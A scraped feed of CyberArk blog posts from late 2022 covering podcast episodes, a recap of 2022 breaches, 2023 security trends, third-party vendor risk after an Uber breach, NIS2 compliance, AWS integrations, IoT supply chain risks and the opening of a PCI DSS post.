EP 12: K-12 Schools in Ransomware Crosshairs

At the start of the 2022 school year, ransomware actors disproportionately targeted the education sector, especially K-12. We explore why, what attackers are after and what schools can do.

Listen Now

EP 13: Cyber Fundamentals: Where Things Fall Apart

Bryan Murphy, senior director of architecture services and incident response at CyberArk, goes back to the basics, revisiting “cybersecurity hygiene” best practices to help organizations mitigate the risk of cyber infection and boost overall security health.

Listen Now

EP 14: Humanizing Cybersecurity

Cybersecurity can be a tough job. Practitioners are often stretched thin as they protect against the unknown day after day. Kirsten Davies, CISO at Unilever, shines a spotlight on mental health issues in the industry, advocates against stigma and emphasizes the critical human side of cybersecurity.

Listen Now

EP 15:  Navigating a Ransomware Crisis in Latin America

The 2022 ransomware attacks on Costa Rica wreaked havoc on government and healthcare systems, crippled the economy and prompted a national state of emergency. Frontline defender Vinicio Chaves Alvarado, acting CISO at BAC Credomatic, describes the journey of restabilizing and rebuilding trust.

Listen Now

EP 16: Beware of Stolen Cookies for MFA Bypass

Shay Nahari and Andy Thompson revisit the show to talk about a major attack trend. SaaS apps are everywhere, and attackers are increasingly targeting session cookies to bypass authentication and MFA and hijack accounts. Tune in to learn what to watch out for and how to protect your organization.

Listen Now

EP 17: Highmark Health CISO on the Power of Storytelling

Omar Khawaja, CISO at Highmark Health, shares his nine-year journey of cultivating talent and creating a strong cybersecurity culture at a leading healthcare organization. Learn how the power of language, relationships and story can be used to effectively communicate and drive organizational change.

Listen Now

Find Trust Issues on Spotify, Apple Podcasts, Amazon Music, Google Podcasts or wherever you get your podcasts.

]]>
Revisiting Major 2022 Breaches and Cybersecurity Events https://www.cyberark.com/blog/revisiting-major-2022-breaches-and-cybersecurity-events/ Tue, 27 Dec 2022 14:00:18 +0000 https://www.cyberark.com/?p=138283 Revisiting Major 2022 Breaches and Cybersecurity Events

Before we ring in the new year, we’re reflecting on some of the biggest cybersecurity events of 2022.

It’s been a stressful 12 months for security teams, to say the least. Many open cybersecurity jobs remained unfilled, straining staff while they grappled with remote workforce risks, accelerated cloud adoption, mounting cybersecurity debt and heightened exposure to ransomware and software supply chain attacks. Meanwhile, the Ukraine conflict created a host of new and formidable challenges.

Identity compromise was a familiar theme across major 2022 breaches – from a high-profile incident involving a leading identity provider, to the rise in deceptive “MFA fatigue” phishing, to a teenager’s headline-grabbing attack on a major ride sharing service. Tackling identity-centric challenges was top of mind for government leaders and business executives alike. In some cases, conversations about the “trust no identity, verify every identity” Zero Trust imperative turned to action. Governments enacted stronger cybersecurity regulations to harden networks and protect access to sensitive data and critical infrastructure. Private sectors increased supply chain scrutiny to identify areas of weakness, such as embedded credentials and unmanaged secrets. Under extreme pressure, cyber insurance providers continued to ramp up requirements, making it even harder for organizations purchase or renew policies. And several landmark legal cases placed breach responsibility and disclosure obligations on individuals, suggesting major changes ahead.

Below, we revisit the past year in cybersecurity, because history tends to repeat itself until we learn from it and make changes. While attack methods and threats continue to evolve, focusing on identity – the one true constant – is a solid cybersecurity strategy for 2023 and beyond.

January 2022 Breaches

  • Attackers breach a global humanitarian organization, gaining access to sensitive data and disrupting services around the world.
  • A U.S. mass media conglomerate discovers a persistent cyberattack targeting journalists in a suspected espionage campaign.
  • An attack on a global cryptocurrency exchange results in unauthorized withdrawals worth $35 million.
  • A multi-month attack spree by Lapsus$ Group compromises several leading tech companies. After the dust settles, an identity vendor is disclosed as the initial attack vector.

February 2022 Breaches

 March 2022 Breaches

April 2022 Breaches

  • Ransomware attacks wreak havoc on Costa Rica, prompting the country’s president to declare a national state of emergency.
  • A former employee at a major mobile payment app downloads sensitive files containing personal customer information, impacting up to 8 million people.

June 2022 Breaches

July 2022 Breaches

  • Attackers breach Italy’s energy agency compromising servers, blocking access to systems and suspending access to its website for a week.

August 2022 Breaches

September 2022 Breaches

October 2022 Breaches

November 2022 Breaches

December 2022 Breaches

  • Another large Australian telecoms firm reports data breach impacting 132,000 customers resulting from a “misalignment of databases.”
  • Security researchers report a spike in devices infected with the TrueBot malware downloader created by the Silence criminal group.
  • Back-to-back attacks on a popular ride sharing company then a large cryptocurrency exchange underscore third-party vendor security risks.

 

]]>
2023 Cybersecurity Trends We’re Tracking https://www.cyberark.com/blog/2023-cybersecurity-trends-we-re-tracking/ Fri, 16 Dec 2022 14:00:35 +0000 https://www.cyberark.com/?p=137870

Cybersecurity doesn’t happen in a vacuum. Evolving attack trends, world events, regulatory changes, shifting organizational priorities and many other factors influence enterprise programs. With 2023 just around the corner, cybersecurity teams are considering them all carefully as they chart their course.

We asked members of the CyberArk team to weigh in on top trends influencing 2023 cybersecurity strategies. Here’s what they had to say about new (or reemergent) challenges and opportunities ahead.

First up, a look at how rising geopolitical risk is impacting cybersecurity leaders’ bottom lines.

 “As big banks predict a gloomy economic outlook for 2023, CISOs are being asked to do even more with less. Security leaders’ need to manage ever-growing business risk while flat-lining (or even slashing) operational spending will likely drive further consolidation across the cybersecurity market and accelerate cloud adoption to maximize efficiencies.” – David Higgins, Senior Director, Field Technology Office, CyberArk

During this turbulent economic time, major cloud service providers (CSPs) and their partners are focusing on interoperability to help customers cut costs and minimize friction.

“As evidenced at last month’s AWS re:Invent event, major cloud service providers (CSPs) are investing heavily in making services more flexible. This enables organizations to extend existing tech investments, such as their own security tools, throughout their hybrid cloud environments. From a practical standpoint, this means security teams don’t have to learn another system, toggle between another interface or hire specialized experts to bridge skills gaps. More security interoperability translates to more effective risk reduction in the cloud.” – Sam Flaster, Product Marketing Team Lead, PAM, CyberArk

Zoom back from the major CSPs to consider the much larger (and constantly expanding) cloud security ecosystem, and there’s likely to be at least one major shakeup ahead.

“Billions of dollars have been invested in cloud security, creating numerous unicorns along the way. However, despite the plethora of acronyms (i.e., CSPM, CIEM, CWPP, CNAP), we are still in the very early innings. As cloud security requirements come into sharper focus and investors lose patience with companies who generate massive losses, there will be at least one high-profile cloud security vendor implosion in the coming year.” – Clarence Hinton, Chief Strategy Officer, Head of Corporate Development, CyberArk

From the cloud to the CI/CD pipeline, cyberattacks continue to surge, but underlying attack motivations are changing. As we’ve learned from history, times of economic uncertainty bring more financially driven criminal activity. Thanks to commoditized ransomware, the bar to entry is lower than ever, and even unskilled attackers can make cash fast.

“2022 was the worst year for ransomware to date and we can expect more of the same in 2023 – except motivations will shift from ideological to financial, causing a spike in hit and run-style attacks made possible by readily available RaaS and access as a service.” – Daniel Schwartzer, Chief Product Technologist, CyberArk

Meanwhile, the ongoing Ukraine conflict continues to drive increased threats and cyberattacks on critical infrastructure, creating heightened urgency for collaboration. For instance, just this month more than 1,000 global cyber professionals from NATO member countries came together to conduct cyberattack simulations on critical infrastructure to test response capabilities.

“More concerned countries are banding together to combat cyberterrorism and strengthen defenses to protect critical infrastructure and citizens. This push will extend to the private sector in the coming year, with enterprise organizations answering the call to help bring systems back online after attacks and fending off future threats to our modern way of life. As global cyber collaboration increases, the stakes will become higher for those unwilling to join the fight.” – David Higgins, Senior Director, Field Technology Office, CyberArk

As it becomes more difficult to keep attackers out of critical infrastructure environments, governing bodies and insurance carriers are stepping up specific cybersecurity requirements that emphasize threat detection and response capabilities inside the network. To meet these requirements and defend against attacks, organizations must find ways to verify, manage and secure identities continuously.

“More organizations are falling within the scope of heightened cybersecurity requirements for the first time, signaling major compliance changes ahead. For example, Australia’s expanded Security of Critical Infrastructure Act (SOCI) now encompasses 11 sectors and places stringent cybersecurity requirements on critical infrastructure owners/operators as well as the businesses who have a direct interest in critical infrastructure assets. And many businesses operating in Europe are assessing their cybersecurity activities and evaluating their governance frameworks as they prepare to meet significantly expanded requirements outlined in the NIS2 Directive.” – David Higgins, Senior Director, Field Technology Office, CyberArk

Rising regulatory requirements don’t stop at cybersecurity. Environmental sustainability is becoming a strategic imperative for businesses and guidelines for corporate disclosures are coming into focus.

“Corporations’ net zero commitments are set to double between 2022 and 2023 – and the pressure is on to back up these pledges with real action. Expect to see value chain emissions reporting requirements intensify in the next 12 months, with mandates for proof of carbon footprint labels and other validation methods becoming more mainstream for both consumer and enterprise products and services.” – Daniel Schwartzer, Chief Product Technologist, CyberArk

One thing that won’t change in 2023 is remote work. It’s here to stay, which may force some security teams to backtrack to address cybersecurity debt.

 “In the rush to support work-from-home requirements, many organizations got VPN access up and running and ‘checked the box’ during the pandemic. But did they really check it? Three years later, workers are still logging on from home using corporate devices (and risky habits like using default wireless router passwords persist). What impact will the recent wave of corporate layoffs and departures have on all those corporate assets sitting in people’s bedrooms? We may start to understand in the months ahead. – Chris Maroun, Senior Director, Field Technology Office, CyberArk

Are organizations ready to face these cybersecurity challenges in the months ahead? Many C-level executives are optimistic as they map security spending decisions to key 2023 priorities. They recognize an identity-centric security approach isn’t just about protection, it’s about business enablement. Yet recent CyberArk Identity Security Maturity Model research reveals some skepticism from other business stakeholders, suggesting a need for more communication and program insights.

“C-level executives are increasing spend on Identity Security tools and services as part their overall cybersecurity budgets. These investments are expected to improve identity-related security capabilities such as identifying anomalous behavior, reducing security incident response time and increasing agility. Our research shows that 15% more C-level respondents believe these investments have improved nearly all identity-related security capabilities than other (VP, Director, etc.) respondents. In the near future, C-level executives will recognize this ROI perception gap between investments and implementation and demand a regular review of identity-related security metrics to validate investments.” – Amita Potnis, Director, Brand and Thought Leadership, CyberArk

Are you tracking other 2023 cybersecurity trends? Share your thoughts on Twitter @CyberArk – we want to hear them.

 

]]>
Latest Uber Breach Underscores Third-Party Vendor Security Challenges https://www.cyberark.com/blog/latest-uber-breach-underscores-third-party-vendor-security-challenges/ Thu, 15 Dec 2022 14:00:27 +0000 https://www.cyberark.com/?p=137772

Uber is back in the spotlight, this time for a breach involving a third-party vendor. According to reports, an attacker accessed the vendor organization’s public cloud backup server, obtaining and then leaking sensitive Uber data, including information on more than 77,000 employees. Just days later, a large cryptocurrency exchange disclosed a data leak of over 5.7 million emails that stemmed from an attack on a third party.

Such stories are unsettling – sober reminders that any weakness in any third-party vendor could make your organization the next big headline. While “who done it” and “how” questions swirl about these high-profile incidents, many security teams are contemplating how to protect their critical systems and data from attacks involving third-party vendors.

While I wish I could give them a simple checklist, there is no easy way to erase third-party risk. However, I can offer seven observations and best practices based on our CyberArk Remediation Services team’s work in helping organizations recover from some of the world’s largest breaches:

  • The buck stops with you. A vendor supply chain is a lot like an assembly line. Organizations bring on third parties to perform certain tasks because it’s cheaper or easier for them to do so. It’s also a way to circumvent regulatory hurdles since smaller third-party organizations aren’t beholden to the same compliance regulations. But the buck ultimately stops with your organization. Your third-party vendors become an extension of your organization, and you are only as strong as your weakest link. As such, your vendor selection choices matter, and trust – building it and keeping it – is the foundation of everything.
  • EXCEPT when it comes to security controls. Here, it’s best to remove trust from the equation entirely by enforcing Zero Trust access principles with zero exceptions. Authenticate your third-party users (and their devices) each time they require privileged access to your corporate systems. Bonus points if you can do so in a way that’s both secure and minimally bothersome for the end-user, like using biometrics.
  • Separate, separate, separate. Many organizations struggle with network topology. Just because a third-party vendor requires access to sensitive data and systems doesn’t mean they should get access to everything, which is something we see all too often. For this, network separation is the name of the game.
  • Don’t assume your internal controls match your third-party controls. For instance, your existing privileged access management solution may isolate and monitor employees’ privileged user sessions, but what about those of third-party staff and outside devices? Ensuring strong privileged access practices and policies extend across your supplier ecosystem isn’t just about risk reduction. FIPS 200, HIPAA, PCI DSS and many industry regulations require them.
  • Third-party vendor audits are important, but not fail-safe. Validating your vendors’ own internal security controls regularly is important for understanding whether their VPN system is up to date, if they’re using rogue IoT devices, how they’re securing their cloud environments and so on. But just because a company scores an A+ on a security assessment today doesn’t mean their security controls won’t slip tomorrow.
  • Consistency is key. To combat security controls erosion, promote consistency in your vendors’ security practices. For example, automated dynamic or per-session controls can help them eliminate long-standing access and validate least privilege enforcement continuously to reduce risk (along with headaches associated with manual provisioning).
  • Show me the data. Penetration testing and Red Team exercises reveal all kinds of issues you didn’t know you had. Your organization should conduct them, and your vendors should too. Ask third-party vendors to share their test results so you can address gaps in a collaborative, transparent manner.

As an organization, there is only so much you can do to mitigate third-party breaches like those seen this week. You cannot assume equivalent controls exist at your third-party organizations – another reason why assume breach is the logical cybersecurity approach. With this mindset, your priority shifts from preventing attacks to stopping them before they stop business. Embracing a proactive Identity Security strategy – which calls for defense-in-depth and paves the way for Zero Trust – and holding your third-party partners to the same standards, is critical to strengthening vendor supply chain security and measurably reducing risk.

Interested in learning more? See how your organization can secure third-party access to critical internal resources with full session isolation, monitoring and audit capabilities without the need for VPNs, passwords or agents.

]]>
An Identity Security Approach to NIS2 Readiness https://www.cyberark.com/blog/an-identity-security-approach-to-nis2-readiness/ Fri, 09 Dec 2022 14:00:01 +0000 https://www.cyberark.com/?p=137400

With its new and improved Network and Information Security Directive, NIS2, the European Union joins a growing list of governments around the world that are enacting stronger cybersecurity mandates to protect critical infrastructure.

NIS2 was formally adopted by EU Member States and the European Parliament last month. Now comes the complicated part: All 27 countries must transpose the Directive. Only time will tell exactly how NIS2 guidance gets folded into country-specific laws, such as KRITIS in Germany, or the rules governing opérateurs de services essentiels (OSE) in France. But recent attacks have made one thing clear: Traditional perimeter-based security models — conceived to control access to trusted enterprise networks — aren’t suited for the digital era. Consider that in 2022:

Zero Trust Architectures Protect Against Modern Cyber Threats

Today’s defenders must be able to verify, manage and secure identities continuously to prevent breaches. NIS2 guidance promotes Zero Trust principles, which assume that all identities (human and machine) are implicitly untrusted and must be authenticated and authorized regardless of network or location. Unlike a traditional perimeter-based security model, a Zero Trust architecture:

  • Protects cloud-based IT and OT systems as well as on-premises IT and OT systems
  • Defends against inside threats as well as external threats
  • Provides inherent security for remote workers and mobile users

As a core pillar of Zero Trust, Identity Security provides a consistent point of security control beyond the perimeter. It limits access to the human or machine identities that need it and only grants the minimum privileges required. This includes continuous authentication to validate a user’s entire session — not simply a single multifactor authentication request — and monitoring user behavior to identify when an identity has been compromised.

Identity Security to Improve NIS2 Readiness

If your organization falls within the scope of NIS2’s broadened parameters, reviewing these eight Identity Security steps can help you improve NIS2 preparations and advance Zero Trust initiatives:

1. Assess your security posture. Though security leaders say credential theft is their No. 1 area of risk, many organizations still assign and track identities manually, making it difficult to understand their true security posture. A security assessment can help identify areas of weakness, such as unmanaged passwords, misconfigured or dormant accounts or machines that are highly susceptible to credential theft attacks.

2. Take steps to safeguard privileged access. Adversaries exploit powerful, privileged accounts to orchestrate attacks, take down critical infrastructure and disrupt essential services. In response, NIS2 guidance promotes limiting administrator-level access accounts and regular password changes, among other foundational cyber hygiene recommendations. To fulfill requirements, covered entities will likely need to implement or strengthen privileged access management controls such as vaulting and rotating credentials, isolating privileged sessions and auditing privileged activities. Automating access decisions, for instance, by enabling just-in-time privileged access, can help streamline these compliance requirements while measurably reducing risk.

3. Proactively protect against ransomware. A 2022 European Union Agency for Cybersecurity (ENISA) report found that ransomware accounts for more than 10 terabytes of stolen data monthly. As ransomware attacks continue to increase in frequency and severity, Member States are urged to develop ransomware policies as part of their national cybersecurity strategies. In preparation for stricter security rules, it would be wise for organizations to focus on locking down critical endpoints (servers, VMs, etc.) by removing local admin rights and implementing policies that help prevent lateral movement and privilege escalation as part of a defense-in-depth approach.

4. Assume breach and put analytics to work. Breaches will happen — that’s a given. Detecting threats and responding quickly is key to minimizing the “blast radius” when they do. Consider how AI and machine learning can aid in risk modeling and scaling detection capabilities, for instance, to immediately spot when a privileged user suddenly tries to access credentials at an unusual time of day or from an unusual location.

5. Scrutinize your supply chain. Take a look at your current third-party vendor assessment, onboarding and ongoing risk management processes. Do you have a clear sense of how each vendor is securing its own systems and how they’re accessing your environment and sensitive resources? In particular, managed services providers (MSPs) have become prime attack targets because of their close integration with operations and warrant heightened scrutiny. Consider your third-party vendors’ DevSecOps practices as you consider your own: What steps are they taking to protect applications, automation tools and third-party software? It’s important to note that while NIS2 doesn’t directly impact small businesses they will be bound by the due diligence and requirements of covered entities within their supply chain ecosystem.

6. Formalize and test your incident response plan. NIS2 calls for faster incident reporting — with the first of several reports due to authorities within the first 24 hours of an incident. If you haven’t already, formalize an incident response plan and test it regularly. Like regulatory bodies, cyber insurance carriers are evaluating data backup practices and incident response plans to understand how quickly organizations can restore operations in the wake of an attack.

7. Prepare your people. The continued barrage of impersonation and spear-phishing attacks targeting high-value identity credentials necessitates a change in culture. Teams and departments must be regularly educated on cybersecurity best practices. If you haven’t rolled out a cybersecurity training program, now’s the time to do so.

8. Step up voluntary information sharing. Thankfully, not every threat results in theft or damage. Yet information sharing is an important part of critical infrastructure protection. Take advantage of intelligence from the threat research community, while doing your part to contribute information on indicators of compromise (IOCs) and vulnerabilities. Though this is not likely to become a compliance mandate, increased collaboration is key to moving cybersecurity forward.

If you’re looking for more tips on assessing your organization’s current strategy and tackling identity-related risk to meet NIS2 compliance requirements, check out the CyberArk Blueprint for Identity Security Success.

Our team will continue to track NIS2-related developments to help EU businesses navigate changing compliance requirements. If you have questions in the meantime, please get in touch — we’re here to help.

For in-depth guidance on preparing for NIS2, read our whitepaper and watch our webinar series.

]]>
NIS2 to Boost Cybersecurity Requirements for Many EU Businesses   https://www.cyberark.com/blog/nis2-to-boost-cybersecurity-requirements-for-many-eu-businesses/ Thu, 08 Dec 2022 14:00:00 +0000 https://www.cyberark.com/?p=137374 NIS2 to Boost Cybersecurity Requirements for Many EU Businesses

On November 28, 2022, NIS2 officially replaced the European Union’s Network and Information Security (NIS) Directive, heralding significant compliance changes for many EU businesses. This long-anticipated revamp aims to enhance critical infrastructure resilience and align cybersecurity efforts across the EU.

Read on to learn how and why EU cybersecurity regulations are changing, and if your organization is covered under NIS2.

NIS vs. NIS2: What’s Changed

The original NIS Directive was the first EU-wide piece of cybersecurity legislation. First adopted in 2016, the Directive represented a major step forward. Yet over the years, it proved difficult to implement consistently. NIS2 encompasses six major changes to address these challenges and respond to growing threats posed by digitalisation, including:

1. A broader scope. The list of industries covered by NIS2 is much longer than before, meaning a lot more EU businesses must take note. Additionally, NIS2 provides greater detail on which entities within these sectors are subject to requirements. Any entity with more than 250 employees and an annual turnover of more than EUR 50 million and/or an annual balance sheet above EUR 43 million is covered. And in certain circumstances, entities must comply irrespective of company size, such as public electronic communications network providers.

It’s now up to each Member State to classify these entities as “essential” (e.g., critical infrastructure operators, certain manufacturers) or “important” (e.g., digital services providers, managed services providers). While both groups must meet the same requirements, “essential” entities will face stricter supervision and enforcement.

2. Strengthened security requirements. NIS2 introduces a set of baseline cybersecurity measures that each covered entity must address. These include risk analysis and information system security policies, incident response, business continuity and crisis management, supply chain security, assessment of effectiveness of risk management measures, and encryption and vulnerability disclosure.

3. Enhanced collaboration. NIS2 rules aim to increase trust, information sharing and coordinated management of large-scale cybersecurity incidents at the EU level. The European Cyber Crisis Liaison Organization Network (EU CyCLONe) was established to specifically support these efforts.

4. Faster incident reporting timelines. NIS2 clarifies obligations with more precise provisions on the disclosure process, content and timeline. Notably, impacted companies must submit an initial report to authorities within 24 hours of learning of an incident and a final update within one month’s time.

5. Steeper penalties for non-compliance. Non-compliance fines could reach up to two percent of annual turnover or EUR 10 million, whichever is higher.

6. “Management body” oversight and accountability. For the first time, NIS2 specifically places an obligation on “management bodies” (including C-Suite members) for implementing and complying with heightened security measures and alludes to potential consequences for failure to do so.

Expanded NIS2 Guidance Addresses Current Risks and Future Challenges

NIS2 guidance reflects a rapidly changing threat landscape that looks nothing like it did back in 2016. For instance, many utilities and manufacturers are now converging operational technology (OT) networks and information technology (IT) networks to simplify operations and reduce costs.

Historically, OT and IT networks operated independently. Industrial control traffic flowed over a dedicated OT network using industry-specific supervisory control and data acquisition (SCADA), energy management system (EMS) and manufacturing execution system (MES) protocols. Business application traffic flowed over a separate enterprise IP network that connected to the public internet. If an external threat actor managed to breach the enterprise network, they had no way to access the OT network. Increased network convergence eliminates “air gaps” between the two environments, providing a pathway for external threat actors to access industrial control systems and wreak havoc.

Critical infrastructure operators are also shifting away from proprietary hardware and special-purpose software toward standards-based OT — think Linux-based commodity servers and commercial-off-the-shelf software that are much easier to work with. Unfortunately, this also makes systems more vulnerable to software supply chain attacks, as the infamous SolarWinds breach showed the world.

The NIS2 Commission notes, “Now any disruption, even one initially confined to one entity or one sector, can have cascading effects more broadly, potentially resulting in far-reaching and long-lasting negative impacts in the delivery of services across the whole internal market.”

The risks brought on by digitalisation are many. It’s now common for OT and Internet of Things (IoT) endpoints to connect over the internet, while applications are often deployed in the cloud — far beyond the secure confines of the enterprise network border. What’s more, many workers have gone remote for good, and system administrators (both employees and third parties) routinely manage critical infrastructure from remote locations.

For all these reasons and more, the need for a consistent point of security control beyond the perimeter is critical for defending critical infrastructure against devastating cyberattacks. NIS2 architects recognize this, and advocate for a Zero Trust cybersecurity model that assumes all human and machine identities are implicitly untrusted and must be authenticated and authorized regardless of their location.

Now that NIS2 has been officially enacted, member States have until October 2024 to transpose the Directive into their own national laws, at which time many EU businesses will need to comply with country-specific requirements.

In part two of this NIS2 post, we’ll explore Identity Security best practices that can help critical infrastructure operators, service providers and suppliers prepare for upcoming NIS2 compliance requirements, while strengthening cybersecurity and reducing risk.

For in-depth guidance on preparing for NIS2, read our whitepaper and watch our webinar series.

]]>
Cloud Migration On Your Identity Security Terms https://www.cyberark.com/blog/cloud-migration-on-your-identity-security-terms/ Fri, 02 Dec 2022 20:08:29 +0000 https://www.cyberark.com/?p=137141 Cloud Migration On Your Identity Security Terms

The public cloud is empowering organizations to do incredible things, from exploring new realms in space to transforming cultures. This week at AWS re:Invent in Las Vegas, these real-world cloud innovation stories were on full display.

“Technology has changed how we explore our imagination together,” said Amazon Web Services (AWS) CEO Adam Selipsky in his keynote. “The world is all one neighborhood, and we can all come out and play.”

Companies of all sizes continue flocking to the cloud for its many business benefits: Reduced infrastructure costs, increased flexibility and more dynamic application development, to name a few. Selipsky shared how Airbnb — a company hit particularly hard by the pandemic — took advantage of cloud scalability to help weather the storm and make a remarkable comeback.

Virtually every organization now uses the cloud for some facet of their business — and most companies want to do even more. Especially now, “Businesses are leaning in [to the cloud] as we face economic uncertainty,” said Selipsky. “It can help them be prepared for anything.” He expects cloud adoption will continue to surge over the next five years, in which time the amount of data worldwide will double in a “data explosion.”

Explosive Cloud Growth Brings Benefits and Complications

But with “explosive” data growth come new security challenges. Leading cloud service providers (CSPs) like AWS have combined decades of innovation and technology to deliver modern platforms. And they continue to expand their offerings — from compute infrastructure like virtual machines (VMs), containers and services, to databases and other supporting IT assets — to help organizations achieve their goals even faster.

For one, there simply aren’t enough skilled cloud professionals to keep pace with this evolution. A recent study commissioned by AWS and Cloudreach found more than 70% of global IT leaders view the skills gap as an urgent concern, 46% believe it’s slowing them down and nine percent describe it as an “existential crisis” for their companies.

Modern cloud platforms combine decades of innovation and technology, and customer organizations have access to an ever-growing list of new offerings — from compute infrastructure like virtual machines (VMs), containers and services, to databases and other supporting IT assets — to help them achieve their goals even faster.

Even with highly skilled professionals at the helm, cloud migrations can be complicated — and even create friction between functional groups. For example, development teams may be eager to forge ahead quickly to accelerate their cloud-native DevOps practices, while security teams may want to proceed more slowly. As the latter team evaluates potential impact on existing environments, new risks and increased security management requirements, their caution is warranted. For security teams taking on the cloud, Uncle Ben Parker’s famous advice to the young Peter Parker (aka Spiderman) rings true: With great power comes great responsibility.

With Great (Cloud) Power Comes Great Responsibility

AWS operates under a shared responsibility model in which the CSP is responsible for security of the cloud, while cloud customers are responsible for security within the cloud.

This means customer organizations’ cybersecurity teams are responsible for proper configurations within their own environments. Here’s a concrete example from the Identity Security world: CSPs must patch software on virtual machines (VMs) in a customer environment, but it’s up to the customer to configure Identity Security controls for access to those VMs, such as requiring multifactor authentication or implementing least privilege.

As such, security practitioners have the uniquely challenging job of embracing the cloud to enable the business, while preserving people, process and technology best practices learned on-premises.

Finding the right balance between control and access in cloud environments is crucial, said Selipsky in his keynote. Establishing the right security governance encourages innovation.

Don’t Reinvent the Wheel. Keep Identity Security Simple to Eliminate Cloud Migration Friction

Fortunately, CSPs are investing heavily to increase the flexibility of their services. This makes it possible for customer organizations to use their existing security tools and workflows in their cloud environments. In practical terms, this means security teams don’t have to learn another system, toggle between another interface or hire specialized experts to bridge skills gaps. Interoperability also enhances risk reduction efforts by helping security teams stay ahead of attackers, maintain centralized security control and meet end-users’ requirements for speed and ease of use.

This week at AWS re:Invent, the world’s largest CSP continued to unveil ground-breaking cloud services and innovations. Several new security offerings center on this interoperability concept, enabling organizations operating hybrid environments to integrate and extend their existing Identity Security controls to new AWS services, among other proven cybersecurity practices.

CyberArk was a launch partner for two of these new security services:

  • Amazon Security Lake: CyberArk Audit, an Identity Security Platform Shared Service, now delivers security event information to Amazon Security Lake. Organizations interested in leveraging a security data lake through AWS can now pull in security event findings from CyberArk’s audit service, which collects session recordings and audit information for a variety of identities accessing sensitive systems across hybrid cloud environments. This integration allows organizations to holistically review their security and audit data, enabling operational efficiencies and improving analysis of security events.
  • AWS Verified Access: CyberArk Identity can now provide identity-related signals for AWS Verified Access — a new AWS service that delivers secure access to private applications hosted on AWS without a VPN. Organizations can now manage all user information, credentials, authentication and role access for AWS in CyberArk Identity as a single source of truth. This enables them to realize all benefits of AWS Verified Access without needing to change their Identity Provider (IdP) or make additional investments in the identity management infrastructure.

We believe security teams work hard enough. They shouldn’t have to reinvent the wheel to reap cloud benefits or defend their hybrid environments from attacks. These launches reflect a broader trend and much-welcomed emphasis on interoperability in cloud security. And our CyberArk team is proud to play a part in this effort.

Interested in extending your organization’s existing Identity Security controls and practices to your AWS environment? CyberArk offers more than 20 certified integrations (and counting) with AWS services. Explore them all on the CyberArk Marketplace.

 

 

 

 

]]>
How the IoT Intensifies Software Supply Chain Risks https://www.cyberark.com/blog/how-the-iot-intensifies-software-supply-chain-risks/ Fri, 02 Dec 2022 14:00:14 +0000 https://www.cyberark.com/?p=137198 How IoT Intensifies Software Supply Chain Risks

The world of Internet of Things (IoT) devices is both fanciful and ubiquitous, from routers and smart appliances popular at home to intelligent building systems and self-monitoring industrial assets that power business. While these connected devices deliver countless benefits, they also represent a major attack vector and data privacy nightmare. And in recent years, SolarWinds, Verkada and other large-scale cyberattacks have brought IoT software supply chain risks into sharper focus.

Hardcoded and Weak Credentials Invite IoT Exploits

Many IoT and operational technology (OT) devices use default credentials that are hardcoded (or embedded) by the manufacturer. This may seem shocking, but it’s also understandable: Digital transformation has brought thousands of IoT devices to the modern enterprise, making IoT credential management costly and complicated. Even when default credentials are changed, they’re often easy to crack due to poor practices like weak password selection, credential sharing or reuse and infrequent rotation. Attackers can use these credentials to access vulnerabilities within IoT system software and firmware (which are plentiful) and move deeper into company systems and supply chains.

Credentials for application access accounts — powerful privileged accounts that enable machine-to-machine interaction — are especially popular targets. By exploiting a vulnerability in an IoT device’s software, an adversary could use an application account to implant malicious software into a legitimate product that’s later deployed by thousands of organizations around the world. Or an attacker could use an organization’s own digital signature system to assert the safety and reliability of a vendor’s product, even after implanting malware in the victim application.

To minimize these risks, all IoT device credentials and secrets should always be secured and managed in a secure vault (never hardcoded), and access for every IoT device on the network should be consistently managed and audited.

IoT Firmware Updates are Few and Far Between 

Many IoT deployments lack built-in secure software and firmware update capabilities. This makes it very difficult for security teams to patch vulnerabilities in a timely manner — especially at scale. Sometimes years or even decades go by without an update. This could leave anything from hotel door locks to life-saving medical equipment to critical utility infrastructure vulnerable to attacks.

Meanwhile, threat actors are finding new ways to hijack firmware updates when they are pushed. By weaponizing routine or fake patches with malicious code or surreptitiously changing application functionality to bypass security mechanisms, they work to scale their attacks by orders of magnitude.

Limited IoT Visibility Leads to Lots of Guesswork

Another big part of the IoT security issue stems from lack of visibility. Organizations struggle to even identify all the IoT and OT devices existing on their network — let alone patch and manage them effectively throughout the full lifecycle. Just 29% of IT security professionals say their organizations have a complete inventory of their IoT and OT devices, according to a recent Ponemon Institute study. Forty-one percent say their organizations primarily use manual processes to identify and correlate compromised IoT and OT devices to attacks.

Automation can lighten the load and provide much-needed clarity, for instance, by continuously scanning for new devices on the network. And by automatically changing default credentials, rotating passwords and updating device firmware, security teams can save valuable time while improving device protection and compliance with company policies.

Recent Steps Raise Public Awareness of IoT Risks in the Software Supply Chain

The ongoing spate of IoT-related incidents and supply chain attacks has prompted both government and industry to get serious about closing these gaps.

In October 2022, the Biden administration unveiled a plan to develop an IoT risk-rating and labeling system for common household devices — a cyber variation of the popular “EnergyStar” program that helps consumers make informed purchasing decisions. A few weeks later, U.S. government agencies released guidance for enterprise customers on procuring and deploying third-party software as part of a broader effort to strengthen resiliency across the digital ecosystem.

These recent steps build on the work of the National Institute of Standards and Technology (NIST) and private sectors to step up IoT regulations and scrutinize IoT software components against stricter cybersecurity standards — and are collectively driving change. For example, tighter restrictions have prompted aviation companies to seek ways to reliably inventory IoT fleets and keep interconnected avionics devices and sensors up to date. This industry is also focused on protecting IoT applications developed in-house from unauthorized access and tampering and enhancing processes to verify software and firmware release integrity.

There’s still much work ahead, as the same Ponemon Institute study shows. Within the past two years, 35% of organizations have experienced a cyber incident in which an IoT device was used to conduct a broader attack. IoT devices can be game-changing. But without a consistent approach for managing devices and their underlying systems, IoT can become a red zone for cybersecurity risk, and potentially trigger a destructive domino effect downstream.

]]>
Meet PCI DSS and Protect Cardholder Data with PAM Controls https://www.cyberark.com/blog/meet-pci-dss-and-protect-cardholder-data-with-pam-controls/ Wed, 23 Nov 2022 14:00:17 +0000 https://www.cyberark.com/?p=136578 Meet PCI DSS and Protect Cardholder Data with PAM Controls

The 2022 holiday online shopping season is shaping up to be a busy one. An estimated 63.9 million people will shop this Cyber Monday, while global eCommerce transactions are expected to climb 15% from October through December 2022 and reach up to $264 billion. Unfortunately, when eCommerce sales surge, credit card fraud and data theft do too.

According to the Internet Crime Complaint Center, credit card fraud accounted for $173 million in losses in 2021. It’s one of the reasons consumers can now mask their credit card numbers when purchasing from an unknown online website. But that’s not enough — especially since holiday scams often target merchants as well.

